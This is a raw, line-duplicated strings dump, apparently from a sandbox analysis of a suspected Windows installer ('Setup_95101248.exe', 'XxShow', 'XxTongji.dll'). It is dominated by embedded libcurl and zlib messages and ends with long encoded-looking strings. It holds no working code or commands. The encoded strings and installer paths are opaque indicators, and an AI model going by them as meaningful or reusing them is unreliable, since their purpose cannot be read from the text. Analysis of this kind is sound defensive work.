# This file was generated by libcurl! Edit at your own risk.
# This file was generated by libcurl! Edit at your own risk.
Send failure: %s
Send failure: %s
Recv failure: %s
Recv failure: %s
[%s %s %s]
[%s %s %s]
ssloc inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getsockname() failed with errno %d: %s
getsockname() failed with errno %d: %s
getpeername() failed with errno %d: %s
getpeername() failed with errno %d: %s
Failed to connect to %s: %s
Failed to connect to %s: %s
Trying %s...
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Failed to set SO_KEEPALIVE on fd %d
Failed to set SO_KEEPALIVE on fd %d
bind failed with errno %d: %s
bind failed with errno %d: %s
Local port: %hu
Local port: %hu
Bind to local port %hu failed, trying next
Bind to local port %hu failed, trying next
Couldn't bind to '%s'
Couldn't bind to '%s'
Local Interface %s is ip %s using address family %i
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Name '%s' family %i resolved to '%s' family %i
TCP_NODELAY set
TCP_NODELAY set
Could not set TCP_NODELAY: %s
Could not set TCP_NODELAY: %s
couldn't connect to %s at %s:%d
couldn't connect to %s at %s:%d
Unable to parse FTP file list
Unable to parse FTP file list
Error in the SSH layer
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Illegal operation
TFTP: Access Violation
TFTP: Access Violation
TFTP: File Not Found
TFTP: File Not Found
Login denied
Login denied
Issuer check against peer certificate failed
Issuer check against peer certificate failed
Invalid LDAP URL
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
A libcurl function was given a bad argument
Operation was aborted by an application callback
Operation was aborted by an application callback
FTP: command REST failed
FTP: command REST failed
FTP: command PORT failed
FTP: command PORT failed
HTTP response code said error
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: The server did not accept the PRET command.
FTP: Accepting server connect has timed out
FTP: Accepting server connect has timed out
FTP: The server failed to connect to data port
FTP: The server failed to connect to data port
FTP: weird server reply
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
URL using bad/illegal format or missing URL
Unsupported protocol
Unsupported protocol
Unknown error %d (%#x)
Unknown error %d (%#x)
Winsock version not supported
Winsock version not supported
Protocol family not supported
Protocol family not supported
Address family not supported
Address family not supported
Operation not supported
Operation not supported
Socket is unsupported
Socket is unsupported
Protocol is unsupported
Protocol is unsupported
Protocol option is unsupported
Protocol option is unsupported
Internal error removing splay node = %d
Internal error removing splay node = %d
Internal error clearing splay node = %d
Internal error clearing splay node = %d
%d.%d.%d.%d
%d.%d.%d.%d
The requested URL returned error: %d
The requested URL returned error: %d
@I.po
@I.po
6-q}k
6-q}k
version=1.0.1.8
version=1.0.1.8
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow\*.*
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow\*.*
in.html?
in.html?
1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
1248.exe
1248.exe
1638648
1638648
-2067134396
-2067134396
adm\LOCALS~1\Temp\XxShow\XxTongji.dll
adm\LOCALS~1\Temp\XxShow\XxTongji.dll
95101248.exe
95101248.exe
c:\Setup_95101248.exe
c:\Setup_95101248.exe
D:\Program Files\XxShow
D:\Program Files\XxShow
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\XxShow
Setup_95101248.exe
Setup_95101248.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
352650550
352650550
1245428
1245428
1114338
1114338
1114320
1114320
1573190
1573190
2162906
2162906
1376468
1376468
95101248
95101248
1507518
1507518
1573146
1573146
1507522
1507522
1507538
1507538
1048780
1048780
1442126
1442126
1573052
1573052
1835232
1835232
1376520
1376520
1638642
1638642
1310942
1310942
1310970
1310970
722076749
722076749
Nullsoft Install System v2.46
Nullsoft Install System v2.46
2.0.0.0
2.0.0.0
Setup_95101248.exe_1596_rwx_10004000_00001000:
callback%d
callback%d
uuuyunbo_53_1248.exe_1536:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
8%u*@Sj%
8%u*@Sj%
t.Gj:W
t.Gj:W
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
Internal error clearing splay node = %d
Internal error clearing splay node = %d
Internal error removing splay node = %d
Internal error removing splay node = %d
Could not resolve %s: %s
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
getaddrinfo() failed for %s:%d; %s
%s:%d
%s:%d
Hostname %s was found in DNS cache
Hostname %s was found in DNS cache
Connected to %s (%s) port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
smtp
smtp
;type=%c
;type=%c
Send failure: %s
Send failure: %s
Write callback asked for PAUSE when not supported!
Write callback asked for PAUSE when not supported!
[%s %s %s]
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
getsockname() failed with errno %d: %s
Local port: %hu
Local port: %hu
Bind to local port %hu failed, trying next
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Trying %s...
Immediate connect fail for %s: %s
Immediate connect fail for %s: %s
%s:%s
%s:%s
%sAuthorization: Basic %s
%sAuthorization: Basic %s
The requested URL returned error: %d
The requested URL returned error: %d
%s auth using %s with user '%s'
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Modified-Since: %s
If-Unmodified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Last-Modified: %s
Referer: %s
Referer: %s
Accept-Encoding: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s
Host: %s%s%s:%hu
Host: %s%s%s:%hu
PTF://
PTF://
Range: bytes=%s
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
PTF://%s:%s@%s
%s HTTP/%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
%s%s=%s
Internal HTTP POST error!
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP POST request
Failed sending HTTP request
Failed sending HTTP request
operation aborted by callback
operation aborted by callback
Read callback asked for PAUSE when not supported!
Read callback asked for PAUSE when not supported!
seek callback returned error %d
seek callback returned error %d
the ioctl callback returned %d
the ioctl callback returned %d
ioctl callback returned error %d
ioctl callback returned error %d
--:--:--
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
d:d:d
d:d:d
d:d
d:d
0123456789
0123456789
Unsupported protocol
Unsupported protocol
URL using bad/illegal format or missing URL
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
HTTP response code said error
FTP: command PORT failed
FTP: command PORT failed
FTP: command REST failed
FTP: command REST failed
Operation was aborted by an application callback
Operation was aborted by an application callback
A libcurl function was given a bad argument
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Invalid LDAP URL
Issuer check against peer certificate failed
Issuer check against peer certificate failed
Login denied
Login denied
TFTP: File Not Found
TFTP: File Not Found
TFTP: Access Violation
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: Unknown transfer ID
TFTP: No such user
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Error in the SSH layer
Unable to parse FTP file list
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
SSL server certificate status verification FAILED
Protocol option is unsupported
Protocol option is unsupported
Protocol is unsupported
Protocol is unsupported
Socket is unsupported
Socket is unsupported
Operation not supported
Operation not supported
Address family not supported
Address family not supported
Protocol family not supported
Protocol family not supported
Winsock version not supported
Winsock version not supported
Unknown error %d (%#x)
Unknown error %d (%#x)
%d.%d.%d.%d
%d.%d.%d.%d
CLIENT libcurl 7.44.0-DEV
CLIENT libcurl 7.44.0-DEV
MATCH %s %s %s
MATCH %s %s %s
DEFINE %s %s
DEFINE %s %s
WSAStartup failed (%d)
WSAStartup failed (%d)
insufficient winsock version to support telnet
insufficient winsock version to support telnet
%s IAC %s
%s IAC %s
%s IAC %d
%s IAC %d
%s %s %s
%s %s %s
%s %s %d
%s %s %d
%s %d %d
%s %d %d
Sending data failed (%d)
Sending data failed (%d)
%s IAC SB
%s IAC SB
%s (unsupported)
%s (unsupported)
%d (unknown)
%d (unknown)
USER,%s
USER,%s
7[^= ]%*[ =]%5s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Syntax error in telnet option: %s
Unknown telnet option %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c%s%c%c
%c%c%c%c
%c%c%c%c
7[^,],7s
7[^,],7s
%c%s%c%s
%c%s%c%s
WS2_32.DLL
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
got option=(%s) value=(%s)
blksize is larger than max supported
blksize is larger than max supported
%s (%d)
%s (%d)
blksize is smaller than min supported
blksize is smaller than min supported
%s (%ld)
%s (%ld)
%s (%d) %s (%d)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
%s%c%s%c
tftp_send_first: internal error
tftp_send_first: internal error
Received last DATA packet block %d again.
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
tftp_rx: internal error
Received ACK for block %d, expecting %d
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
tftp_tx: internal error, event: %i
TFTP finished
TFTP finished
bind() failed; %s
bind() failed; %s
TFTP response timeout
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
LDAP remote: %s
There are more than %d entries
There are more than %d entries
LOGIN %s %s
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
AUTHENTICATE %s
No known authentication mechanisms supported!
No known authentication mechanisms supported!
LIST "%s" *
LIST "%s" *
SELECT %s
SELECT %s
FETCH %s BODY[%s]
FETCH %s BODY[%s]
FETCH %s BODY[%s]
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}
APPEND %s (\Seen) {%I64d}
SEARCH %s
SEARCH %s
LOGINDISABLED
LOGINDISABLED
STARTTLS not supported.
STARTTLS not supported.
STARTTLS denied. %c
STARTTLS denied. %c
Access denied. %c
Access denied. %c
IMAPS not supported!
IMAPS not supported!
%cd
%cd
%s %s
%s %s
USER %s
USER %s
APOP %s %s
APOP %s %s
AUTH %s %s
AUTH %s %s
AUTH %s
AUTH %s
STLS not supported.
STLS not supported.
Authentication failed: %d
Authentication failed: %d
PASS %s
PASS %s
POP3S not supported!
POP3S not supported!
SMTP
SMTP
EHLO %s
EHLO %s
HELO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:%s
RCPT TO:
RCPT TO:
Got unexpected smtp-server response: %d
Got unexpected smtp-server response: %d
Remote access denied: %d
Remote access denied: %d
Command failed: %d
Command failed: %d
MAIL failed: %d
MAIL failed: %d
RCPT failed: %d
RCPT failed: %d
DATA failed: %d
DATA failed: %d
SMTPS not supported!
SMTPS not supported!
PORT
PORT
Preparing for accepting server on data port
Preparing for accepting server on data port
FTP response timeout
FTP response timeout
FTP response aborted due to select/poll error: %d
FTP response aborted due to select/poll error: %d
CWD %s
CWD %s
getsockname() failed: %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
%s |%d|%s|%hu|
Failure sending EPRT command: %s
Failure sending EPRT command: %s
,%d,%d
,%d,%d
Failure sending PORT command: %s
Failure sending PORT command: %s
Connect data stream passively
Connect data stream passively
PRET %s
PRET %s
PRET STOR %s
PRET STOR %s
PRET RETR %s
PRET RETR %s
REST %d
REST %d
SIZE %s
SIZE %s
%s%s%s
%s%s%s
MDTM %s
MDTM %s
APPE %s
APPE %s
STOR %s
STOR %s
%c%c%c%u%c
%c%c%c%u%c
Illegal port number in EPSV reply
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
Failed to do PORT
dddddd
dddddd
ddd d:d:d GMT
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
unsupported MDTM reply format
Got a d response code instead of the assumed 200
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
ftp server doesn't support SIZE
RETR %s
RETR %s
Failed FTP upload:
Failed FTP upload:
RETR response: d
RETR response: d
PBSZ %d
PBSZ %d
ACCT %s
ACCT %s
Access denied: d
Access denied: d
ACCT rejected by server: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
PROT %c
Entry path is '%s'
Entry path is '%s'
QUOT command failed with d
QUOT command failed with d
MKD %s
MKD %s
Failed to MKD dir: d
Failed to MKD dir: d
PRET command not accepted: d
PRET command not accepted: d
Remembering we are in dir "%s"
Remembering we are in dir "%s"
Failure sending ABOR command: %s
Failure sending ABOR command: %s
server did not report OK, got %d
server did not report OK, got %d
QUOT string not accepted: %s
QUOT string not accepted: %s
TYPE %c
TYPE %c
Connecting to %s (%s) port %d
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Failure sending QUIT command: %s
Uploading to a URL without a file name!
Uploading to a URL without a file name!
FTPS not supported!
FTPS not supported!
Couldn't open file %s
Couldn't open file %s
Can't open %s for writing
Can't open %s for writing
Can't get the size of %s
Can't get the size of %s
Refusing to issue an RTSP request [%s] without a session ID.
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport:
Transport: %s
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
Range: %s
%s %s RTSP/1.0
%s %s RTSP/1.0
Session: %s
Session: %s
%s%s%s%s%s%s
%s%s%s%s%s%s
curl
curl
%sAuthorization: Digest %s
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
%sAuthorization: NTLM %s
SOCKS4 communication to %s:%d
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s:%hu
%s%s%s:%hu
%s%s%s:%hu
Host: %s
Host: %s
CONNECT %s HTTP/%s
CONNECT %s HTTP/%s
%s%s%s%s
%s%s%s%s
HTTP/1.%d %d
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
Received HTTP code %d from proxy after CONNECT
.jpeg
.jpeg
.html
.html
; filename="%s"
; filename="%s"
%s; boundary=%s
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
Content-Type: %s
couldn't open file "%s"
couldn't open file "%s"
--%s--
--%s--
------------------------xx
------------------------xx
%c%c==
%c%c==
%c%c%c=
%c%c%c=
LOGIN
LOGIN
%s/%s
%s/%s
%s xxxxxxxxxxxxxxxx
%s xxxxxxxxxxxxxxxx
00000001
00000001
xxxx
xxxx
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
%s:%s:%s
%s:%s:%s
%s:%s:x:%s:%s:%s
%s:%s:x:%s:%s:%s
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, opaque="%s"
%s, algorithm="%s"
%s, algorithm="%s"
user=%s
user=%s
auth=Bearer %s
auth=Bearer %s
Unsupported SASL authentication mechanism
Unsupported SASL authentication mechanism
0123456789-
0123456789-
NTLMSSP%c
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
1.2.8
1.2.8
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Operation not permitted
Inappropriate I/O control operation
Inappropriate I/O control operation
Broken pipe
Broken pipe
operator
operator
GetProcessWindowStation
GetProcessWindowStation
curl_global_init failed: %d
curl_global_init failed: %d
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Vista
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows 7
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2008 R2
EEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLCHDMGWJUGGEEGNGQFNGYFBFKCNFLITFTBKBMDRIJGYFYIJAUHNIJEBATDIJJIBBECXHOGPJTEKHXJJJOIYJHGJIPBQBOHLFSDNEXEYIRADGREOBVAX
EEDTFJDVCLHQJLCHDMGWJUGGEEGNGQFNGYFBFKCNFLITFTBKBMDRIJGYFYIJAUHNIJEBATDIJJIBBECXHOGPJTEKHXJJJOIYJHGJIPBQBOHLFSDNEXEYIRADGREOBVAX
EEDTFJDVCLHQJLCBBIIFHBAEGYDJJIHOGOCVIREVDXJRDHDDCGGSDLDRGQBGHOCIGKBJASICIVGWEBFRHIBGCCCNHSCGAF
EEDTFJDVCLHQJLCBBIIFHBAEGYDJJIHOGOCVIREVDXJRDHDDCGGSDLDRGQBGHOCIGKBJASICIVGWEBFRHIBGCCCNHSCGAF
EEDTFJDVCLHQJLCHDMGXGUJLCWACAAFYBDJGEICOFTIAHMJGJKGJCVFNIUJGGHAWAIEZBCCOFEAOATEWJHDFAUCTBXIMFODUIXHKDODHIGBLHFGCERIOJUEUDPFEEGHK
EEDTFJDVCLHQJLCHDMGXGUJLCWACAAFYBDJGEICOFTIAHMJGJKGJCVFNIUJGGHAWAIEZBCCOFEAOATEWJHDFAUCTBXIMFODUIXHKDODHIGBLHFGCERIOJUEUDPFEEGHK
EEDTFJDVCLHQJLCFIRCYIVDOGJJGAYENHBASDPCAJMIIIQBKAACHEIJTASGJDKBXIOICEBAMESEEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
